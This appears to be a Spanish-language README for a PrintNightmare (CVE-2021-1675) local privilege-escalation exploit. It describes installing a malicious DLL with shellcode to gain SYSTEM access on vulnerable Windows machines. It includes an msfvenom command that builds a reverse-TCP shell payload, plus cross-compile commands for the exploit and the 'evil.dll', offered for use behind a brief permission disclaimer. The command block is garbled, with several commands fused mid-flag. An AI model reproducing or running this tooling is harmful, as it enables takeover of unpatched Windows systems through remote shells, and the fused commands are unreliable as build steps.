
Explotación de escalada de privilegios local para CVE-2021-1675 (PrintNightmare) que instala una DLL maliciosa para obtener acceso SYSTEM en sistemas Windows vulnerables.
src/nightmare.cpp: código fuente para explotar CVE-2021-1675 y obtener acceso al sistema
instalando una dll maliciosa
src/payload-dll.cpp: código fuente para la dll con shellcode malicioso en la función de entrada
!!Úsalo solo contra servidores en los que tengas permiso para probar
CVE-2021-1675 es una vulnerabilidad en el Servicio de Cola de Impresión (Print Spooler Service) de Microsoft Windows que permite a un atacante omitir la comprobación de SeLoadDriverPrivilege. Esto puede aprovecharse para lograr una escalada de privilegios en la máquina objetivo instalando una DLL maliciosa que llama a shellcode o utiliza la API de Windows para establecer una conexión de shell inversa. Las versiones de Windows 10/8/Server 2008/Server 2012 anteriores al 8 de junio de 2021 están afectadas.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/